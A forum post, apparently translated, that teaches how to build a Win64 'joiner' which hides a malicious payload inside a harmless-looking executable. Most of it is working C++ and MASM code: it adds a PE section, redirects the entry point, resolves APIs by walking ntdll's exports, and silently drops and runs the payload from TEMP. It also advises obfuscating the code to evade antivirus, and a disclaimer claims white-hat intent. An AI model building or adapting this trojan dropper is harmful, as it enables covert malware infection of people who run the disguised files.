High-quality gluing. Writing a joiner of executable files for Win64.

Mutt · Jun 7, 2021

Let's imagine that we need to run some malicious code on the victim's machine. We do not have access to this computer, and it seems that the easiest option would be to force the victim to do everything for us. Of course, no one in their right mind will launch questionable software on their device, so the victim needs to be interested - to offer something useful. This is where a joiner comes into play, a tool that will embed our code into the payload and secretly launch it.

WARNING
This article is intended for white-hat hackers, professional penetration testers, and information security executives (CISOs). Neither the author nor the editors are responsible for any possible harm caused by the use of the information in this article.

Are there out-of-the-box solutions for gluing programs and malware loads? Of course, but there are a number of problems here. Such tools are detected by antiviruses, cost money and are often sold as a service, that is, they require payment for a one-time gluing. Free and easy ways to embed a payload like "put files in a self-extracting archive" and completely banal fuflomycin. A hand-made solution can be improved, corrected in the event of a detection, and, of course, will remain free.

A LITTLE OF THEORY
A joiner can and should glue two executable files together. The first is a visual shell, a beautiful picture, and a red herring. This is what the user will see on his computer screen when he launches the executable file. The second is the payload, which is launched without the explicit desire of the user. By default, the second file will not be hidden somehow: if it contains windows or, for example, loud music, the user will notice all this. Therefore, it is necessary to ensure the covert operation of the payload. Joiner only glues, but does not mask the malicious application.

Can a joiner glue an executable file with a picture? Maybe, but it doesn't make sense. Purely theoretically, if he glued the executable file and the picture, the output would still be an executable file that would not have the extension .jpg, .png or any other similar. Editors and image viewers will not be able to open such a file. Or we will get a picture, but in this case we will not be able to run the executable file. There is another option when the application starts and opens a picture through the ShellExecute API. The action is entertaining, but only as a focus - there is no benefit from it.

HOW IS OUR OPTION
Our goal will be Windows 10 x64, but once you understand the principle, you can easily rework the toolkit for other versions of the Windows family. The code should work on Windows 7/8 too, but was not tested there. We will be using a mixture of C ++ and assembler.

Work algorithm
The shell is our first exe that will be visible to the client. This is, so to speak, bait. The load is the second exe, which contains malicious content. An additional section is added to the shell, where the shellcode and load are written. Control is immediately transferred to the shellcode, whose task is to extract the load, save it to disk and run it. At the top level, it all comes down to the fact that we get a certain byte array, which must be put in an additional section. Then all that remains is to fix the shell entry point, and that's it - the gluing is complete.

Code:

try {
const auto goodfile = std::wstring(argv[1]);
const auto badfile = std::wstring(argv[2]);
const auto content = CreateData(badfile,goodfile);
AddDataToFile(goodfile, content, L"fixed.exe");
}
catch (const std::exception& error)
{
std::cout << error.what() << std::endl;
}

Adding a section
This is the simplest part of the algorithm, so we'll start with it to warm up. Open the shell file for reading:

Code:

std::ifstream inputFile(inputPe, std::ios::binary);
if (inputFile.fail())
{
const auto message = Utils::WideToString(L"Unable to open " + inputPe);
throw std::logic_error(message);
}

We will need a library for working with PE files. This will greatly simplify for us adding a section, editing its attributes, fixing an entry point, and so on. I chose the old checked out library PE Bliss.

But the library needs to be tweaked a bit if we want to use C ++ 17 to compile projects. These edits are trivial and consist in the fact that you need to change the obsolete auto_ptr to unique_ptr. Because of these edits, I would suggest storing the library code directly in my repository, rather than using a submodule. The section is added like this:

Code:

auto peImage = pe_bliss::pe_factory::create_pe(inputFile);
pe_bliss::section newSection;
newSection.readable (true) .writeable (true) .executable (true); // Section gets read + write + execute attributes
newSection.set_name ("joiner"); // Section name
newSection.set_raw_data(std::string(data.cbegin(), data.cend())); // Контент секции
pe_bliss::section& added_section = peImage.add_section(newSection);
const auto alignUp = [](unsigned int value, unsigned int aligned) -> unsigned int
{
const auto num = value / aligned;
return (num * aligned < value) ? (num * aligned + aligned) : (num * aligned);
};
peImage.set_section_virtual_size(added_section,
alignUp (data.size (), peImage.get_section_alignment ())); // The virtual size of the section is aligned larger
peImage.set_ep (added_section.get_virtual_address () + sizeof (HEAD));

The last line deserves separate comments. The entry point changes there, but the new EP (entry point) is set not at the very beginning of the new section, but at the beginning with an offset equal to the size of the HEAD structure. This structure looks like this:

Code:

struct HEAD
{
unsigned long long sizeOfPayload;
unsigned long long OEP;
};

A logical question arises: what are these fields and where do their values come from? The sizeOfPayload field is the size of the load file, and the OEP is the shell entry point before we added the new section and changed the entry point to it. How the structure of the new section will look as a whole is shown in the picture.

The structure of the new section

[B2]Assembler and shellcode[/B]
The code we add to the shell must meet certain requirements. And in assembly language, it's not just easier to achieve this match - it's the only possible way. Let's figure out why.

When we inject our code into an outsider. Exe, we must be prepared for the code to run at a random address without preparation from the bootloader. There will be no known addresses of API functions, no one will fix relocations, so you need to write self-contained code. Such code is sometimes referred to as shellcode, although it is not shellcode in the sense of exploiting vulnerabilities. Rather, it is shell-code-style code.

So this code:

must be able to work from any address, no matter at what address it ended up in memory;
must find the addresses of the functions it needs.

Delta offset
If the file was compiled for address X, and started from address Y, then all absolute addresses require correction. The difference between these addresses is called delta offset. Here is the code to calculate such a delta offset:

Code:

call delta
delta:
pop rax
mov rcx, offset delta
sub rax, rcx

A function call with this offset looks like this:

Code:

mov rax, offset GetNtdllByModuleList
add rax, [rsp+100h+var_delta]
call rax

Strings mixed with code
Storing strings, variables (data) and code in separate sections is unacceptable for shellcode. Therefore, code and data are mixed here. There are no problems with local variables on the stack. The following technique is used with strings:

Code:

jmp short begin
getprocaddr:
db 'LdrGetProcedureAddress',0
getdllhandle:
db 'LdrGetDllHandle',0
begin:

That is, instructions come with strings. Of course, lines cannot be executed, and we make short jumps across lines.

Finding shellcode boundaries
For this we will use public variables. In the assembly listing, at the very beginning of our shellcode, we'll put a variable. It will serve as a start marker. Likewise, we'll put the variable at the end of the code.

Code:

PUBLIC sizeOfPayload;
PUBLIC FinishMarker start marker; Shellcode completion marker
.CODE
sizeOfPayload QWORD 0; Structure fields HEAD
OEP QWORD 0
launcher proc; The beginning of the code itself

MASM, cmake и Visual Studio

We need to make friends with these tools. Macro assembler is needed to write shellcode, because you cannot embed assembly code into a C ++ program using __asm {} in x64 architecture. A separate file with assembly code is created, usually the .asm extension is used for such files, and the following directives are added to CMakeLists.txt:

Code:

enable_language(ASM_MASM)
set(ASMSRC shellcode.asm)
target_sources(${PROJECT_NAME} PRIVATE ${ASMSRC})
if(CMAKE_CL_64 EQUAL 0)
set_source_files_properties(${ASMSRC} PROPERTIES COMPILE_FLAGS "/safeseh /DSC_WIN32")
else()
set_source_files_properties(${ASMSRC} PROPERTIES COMPILE_FLAGS "/DSC_WIN64")
endif()

Now we will be able to link two object files, provided that the extern keyword is used in C ++. For example:

Code:

extern "C" unsigned long long sizeOfPayload;

Load start algorithm
The shell code works like this:
1. Looks for the path to the TEMP directory.
2. Writes a file with a load there.
3. Runs this file for execution.
4. Transfer control to the original shell entry point.

As a listing, it might look like this:

Code:

void DropToDiskAndExecute(const uint8_t* data, unsigned int sizeData, const API_Adresses* addresses)
{
STARTUPINFOA startup{0};
PROCESS_INFORMATION procInfo{0};
const char surprise[] = "payload.exe";
const auto size = reinterpret_cast<gettemppatha*>(
addresses->GetTempPathA)(0, nullptr);
auto* location = reinterpret_cast<virtualalloc*>(addresses->VirtualAlloc)
(nullptr, size + sizeof(surprise),
MEM_COMMIT, PAGE_READWRITE);
if (!location)
{
return;
}
reinterpret_cast<gettemppatha*>(addresses->GetTempPathA)(size, reinterpret_cast<LPSTR>(location));
reinterpret_cast<winlstrcat*>(addresses->lstrcatA)(reinterpret_cast<LPSTR>(location), surprise);
auto handle = reinterpret_cast<createfilea*>(addresses->CreateFileA)
(reinterpret_cast<LPSTR>(location), GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr,
CREATE_ALWAYS, 0, 0);
reinterpret_cast<writefile*>(addresses->WriteFile)(handle, data,
sizeData, nullptr, nullptr);
reinterpret_cast<closehandle*>(addresses->CloseHandle)(handle);
reinterpret_cast<createprocessa*>(addresses->CreateProcessA)(reinterpret_cast<LPSTR>(location),
nullptr,
nullptr, nullptr, FALSE,
0, nullptr, nullptr, &startup, &procInfo);
reinterpret_cast<closehandle*>(addresses->CloseHandle)(procInfo.hProcess);
reinterpret_cast<closehandle*>(addresses->CloseHandle)(procInfo.hThread);
reinterpret_cast<virtualfree*>(addresses->VirtualFree)(location, 0, MEM_RELEASE);
}

This code deserves a closer look. First, it's in C ++. But how can this be? Shouldn't the shellcode be in assembly? Yes, assembly language shellcode. It was just that at the beginning there was this code, and then I disassembled it and copied the result (with minor edits) into shellcode.asm. Secondly, it is a pure function, that is, the result of its operation depends only on the input parameters. This is important because such functions are generated by the compiler almost immediately in the shell-code-style we need. Thirdly, there is no error handling, because in the event of an error, we should not process it in any way and generally detect our presence. It is also important that all the necessary API functions are submitted to us as input:

Code:

struct API_Adresses
{
FARPROC GetTempPathA;
FARPROC VirtualAlloc;
FARPROC lstrcatA;
FARPROC CreateFileA;
FARPROC WriteFile;
FARPROC CloseHandle;
FARPROC CreateProcessA;
FARPROC VirtualFree;
};

For the algorithm to work, we need eight functions. But how do you find their addresses?

Search API in memory
The algorithm is quite simple:

We are looking for the ntdll.dll download base.
In the export table, we find two functions: LdrGetDllHandle and LdrGetProcedureAddress.
With their help, we find the addresses of eight functions from the API_Adresses structure.

The ntdll.dll download base is searched because peb_loader_data belongs to the ntdll.dll space:

Code:

GetNtdllByModuleList:
mov rax, gs:[60h]
mov ecx, 5A4Dh
mov rax, [rax+18h]
and rax, 0FFFFFFFFFFFFF000h
try_again:
cmp [rax], cx
jz short finish
sub rax, 1000h
jnz short try_again
finis

h:
ret

The code for parsing the export table was honestly borrowed from the Internet (although the original version contains a bug that has been fixed in my code):

Code:

;http://mcdermottcybersecurity.com/articles/windows-x64-shellcode
;look up address of function from DLL export table
;rcx=DLL imagebase, rdx=function name string
;DLL name must be in uppercase
;r15=address of LoadLibraryA (optional, needed if export is forwarded)
;returns address in rax
;returns 0 if DLL not loaded or exported function not found in DLL
;NtGetProcAddressAsm proc
NtGetProcAddressAsm:
push rcx
push rdx
push rbx
push rbp
push rsi
push rdi
start:
found_dll:
mov rbx, rcx ;get dll base addr — points to DOS "MZ" header
mov r9d, [rbx+3ch] ;get DOS header e_lfanew field for offset to "PE" header
add r9, rbx ;add to base — now r9 points to _image_nt_headers64
add r9, 88h ;18h to optional header + 70h to data directories
;r9 now points to _image_data_directory[0] array entry
;which is the export directory
mov r13d, [r9] ;get virtual address of export directory
test r13, r13 ;if zero, module does not have export table
jnz has_exports
xor rax, rax ;no exports — function will not be found in dll
jmp done
has_exports:
lea r8, [rbx+r13] ;add dll base to get actual memory address
;r8 points to _image_export_directory structure (see winnt.h)
mov r14d, [r9+4] ;get size of export directory
add r14, r13 ;add base rva of export directory
;r13 and r14 now contain range of export directory
;will be used later to check if export is forwarded
mov ecx, [r8+18h] ;NumberOfNames
mov r10d, [r8+20h] ;AddressOfNames (array of RVAs)
add r10, rbx ;add dll base
dec ecx ;point to last element in array (searching backwards)
for_each_func:
lea r9, [r10 + 4*rcx] ;get current index in names array
mov edi, [r9] ;get RVA of name
add rdi, rbx ;add base
mov rsi, rdx ;pointer to function we're looking for
compare_func:
cmpsb
jne wrong_func ;function name doesn't match
mov al, [rsi] ;current character of our function
test al, al ;check for null terminator
jz bug_fix ;bugfix here — doulbe check of zero byte
;if at the end of our string and all matched so far, found it
jmp compare_func ;continue string comparison
wrong_func:
loop for_each_func ;try next function in array
xor rax, rax ;function not found in export table
jmp done
bug_fix:
mov al, [rdi]
test al, al
jz short found_func
jmp short compare_func
found_func: ;ecx is array index where function name found
;r8 points to _image_export_directory structure
mov r9d, [r8+24h] ;AddressOfNameOrdinals (rva)
add r9, rbx ;add dll base address
mov cx, [r9+2*rcx] ;get ordinal value from array of words
mov r9d, [r8+1ch] ;AddressOfFunctions (rva)
add r9, rbx ;add dll base address
mov eax, [r9+rcx*4] ;Get RVA of function using index
cmp rax, r13 ;see if func rva falls within range of export dir
jl not_forwarded
cmp rax, r14 ;if r13 <= func < r14 then forwarded
jae not_forwarded
;forwarded function address points to a string of the form <DLL name>.<function>
;note: dll name will be in uppercase
;extract the DLL name and add ".DLL"
lea rsi, [rax+rbx] ;add base address to rva to get forwarded function name
lea rdi, [rsp+30h] ;using register storage space on stack as a work area
mov r12, rdi ;save pointer to beginning of string
copy_dll_name:
movsb
cmp byte ptr [rsi], 2eh ;check for '.' (period) character
jne copy_dll_name
movsb ;also copy period
mov dword ptr [rdi], 004c4c44h ;add "DLL" extension and null terminator
mov rcx, r12 ;r12 points to "<DLL name>.DLL" string on stack
call r15 ;call LoadLibraryA with target dll
mov rcx, r12 ;target dll name
mov rdx, rsi ;target function name
jmp start ;start over with new parameters
not_forwarded:
add rax, rbx ;add base addr to rva to get function address
done:
pop rdi
pop rsi
pop rbp
pop rbx
pop rdx
pop rcx
ret

When we have the addresses of the two cornerstone functions LdrGetDllHandle and LdrGetProcedureAddress, then we can find the address of the function for any already loaded library. Liba kernel32.dll is also loaded by the loader immediately, so we can easily find all the addresses we are interested in:

Code:

GetProcedureAddressAsm:
var_28= word ptr -28h
var_26= word ptr -26h
var_20= qword ptr -20h
var_18= word ptr -18h
var_16= word ptr -16h
var_10= qword ptr -10h
arg_0= qword ptr 8
arg_8= qword ptr 10h
arg_10= qword ptr 18h
arg_18= qword ptr 20h
mov [rsp+arg_10], rbx
mov [rsp+arg_18], rsi
push rdi
sub rsp, 40h
xor ebx, ebx
mov rdi, rdx
test rcx, rcx
mov rdx, rcx
mov ecx, ebx
mov rsi, r9
mov r10, r8
jz short loc_14000689A
cmp [rdx], cx
jz short loc_140006898
nop dword ptr [rax+00000000h]
loc_140006890:
inc ecx
cmp [rdx+rcx*2], bx
jnz short loc_140006890
loc_140006898:
add ecx, ecx
loc_14000689A:
mov [rsp+48h+var_28], cx
lea r9, [rsp+48h+arg_0]
add cx, 2
mov [rsp+48h+var_20], rdx
mov [rsp+48h+var_26], cx
lea r8, [rsp+48h+var_28]
xor ecx, ecx
xor edx, edx
call r10
test rdi, rdi
jz short loc_1400068D0
cmp byte ptr [rdi], 0
jz short loc_1400068D0
loc_1400068C8:
inc ebx
cmp byte ptr [rbx+rdi], 0
jnz short loc_1400068C8
loc_1400068D0:
mov rcx, [rsp+48h+arg_0]
lea r9, [rsp+48h+arg_8]
mov [rsp+48h+var_18], bx
lea rdx, [rsp+48h+var_18]
inc bx
mov [rsp+48h+var_10], rdi
xor r8d, r8d
mov [rsp+48h+var_16], bx
call rsi
mov rax, [rsp+48h+arg_8]
mov rbx, [rsp+48h+arg_10]
mov rsi, [rsp+48h+arg_18]
add rsp, 40h
pop rdi
ret

Don't understand the assembly code? Initially, this code was also written in C ++:

Code:

FARPROC GetProcedureAddress(wchar_t* library, char* function,
LdrGetDllHandlePointer* LdrGetDllHandle,
LdrGetProcedureAddressPointer* LdrGetProcedureAddress)
{
const auto libNameLen = static_cast<USHORT>(GetWcharLen(library));
UNICODE_STRING libraryName{ libNameLen,
libNameLen + sizeof(wchar_t),
library };
HMODULE hModule;
LdrGetDllHandle(nullptr, nullptr, &libraryName, &hModule);
const auto functionNameLen = static_cast<USHORT>(GetCharLen(function));
ANSI_STRING functionName{ functionNameLen,
functionNameLen + sizeof(char),
function };
FARPROC result;
LdrGetProcedureAddress(hModule, &functionName, 0, &result);
return result;
}

To fill the structure with addresses, the following method is used (below is its pseudocode):

Code:

API_Adresses CreateAddressStruct(LdrGetDllHandlePointer* LdrGetDllHandle,
LdrGetProcedureAddressPointer* LdrGetProcedureAddress, GetProcedureAddressPointer* getter)
{
API_Adresses result{};
wchar_t* libname = L"kernel32.dll";
result.CloseHandle = getter(libname, "CloseHandle", LdrGetDllHandle,
LdrGetProcedureAddress);
result.CreateFileA = getter(libname, "CreateFileA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.CreateProcessA = getter(libname, "CreateProcessA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.GetTempPathA = getter(libname, "GetTempPathA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.lstrcatA = getter(libname, "lstrcatA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.VirtualAlloc = getter(libname, "VirtualAlloc", LdrGetDllHandle,
LdrGetProcedureAddress);
result.VirtualFree = getter(libname, "VirtualFree", LdrGetDllHandle,
LdrGetProcedureAddress);
result.WriteFile = getter(libname, "WriteFile", LdrGetDllHandle,
LdrGetProcedureAddress);
return result;
}

All high-level logic looks like this:

Code:

sizeOfPayload QWORD 0
OEP QWORD 0
launcher proc
var_ntdllBase = qword ptr -10h
var_ldrProcedureAddr = qword ptr -20h
var_ldrLoadDll = qword ptr -30h
var_delta = qword ptr -40h
var_apis = qword ptr -90h
call delta
delta:
pop rax
mov rcx, offset delta
sub rax, rcx
sub rsp, 100h
mov [rsp+100h+var_delta], rax
jmp short begin
getprocaddr:
db 'LdrGetProcedureAddress',0
getdllhandle:
db 'LdrGetDllHandle',0
begin:
mov rax, offset GetNtdllByModuleList
add rax, [rsp+100h+var_delta]
call rax
mov [rsp+100h+var_ntdllBase], rax
mov rcx, rax
lea rdx, getprocaddr
mov rax, offset NtGetProcAddressAsm
add rax, [rsp+100h+var_delta]
call rax
mov [rsp+100h+var_ldrProcedureAddr], rax
mov rcx, [rsp+100h+var_ntdllBase]
lea rdx, getdllhandle
mov rax, offset NtGetProcAddressAsm
add rax, [rsp+100h+var_delta]
call rax
mov [rsp+100h+var_ldrLoadDll], rax
mov rdx, rax
mov r8, [rsp+100h+var_ldrProcedureAddr]
mov r9, offset GetProcedureAddressAsm
add r9, [rsp+100h+var_delta]
lea rcx, [rsp+100h+var_apis]
mov rax, offset CreateAddressStructAsm
add rax, [rsp+100h+var_delta]
call rax
mov r8, rax
lea rdx, sizeOfPayload
mov rdx, qword ptr [rdx]
lea rcx, FinishMarker
mov rax, offset DropToDiskAndExecuteAsm
add rax, [rsp+100h+var_delta]
call rax
lea rax, OEP
mov rax, qword ptr [rax]
mov rcx, gs:[60h] ; GetModuleHanldeW(nullptr)
mov rcx, [rcx+10h]
add rax, rcx
add rsp, 100h
jmp rax

The code works because the size of the load is located in the sizeOfPayload variable, and the content of the second executable file itself is located right after the shellcode. The entire project code is available at the link: https://bitbucket.org/KulykIevgen/joiner/src/master/.

CONCLUSIONS
Of course, after some time, any anti-virus software will learn to detect this code, but since it is available in source form, it can be modified, obfuscated, mutated, getting clean files every time. And improvements will undoubtedly be needed.

Here you will need support for both the good old architecture x86, and the entire line of Windows, and it will not be out of place to work on stealth. Now the analyst can see something suspicious just by looking at which section the entry point belongs to, since if it is located in the last section, then the file has undergone modifications.

One can often see complaints on the Internet, for example, against distributors of “pills for greed” (crackers and keygens), for the fact that there are many Trojans in such software. But now you know how these Trojans get there.

A source

High-quality gluing. Writing a joiner of executable files for Win64.

Mutt

Professional

MASM, cmake и Visual Studio

Similar threads

High-quality gluing. Writing a joiner of executable files for Win64.

Mutt

Professional

MASM, cmake и Visual Studio​

Similar threads

MASM, cmake и Visual Studio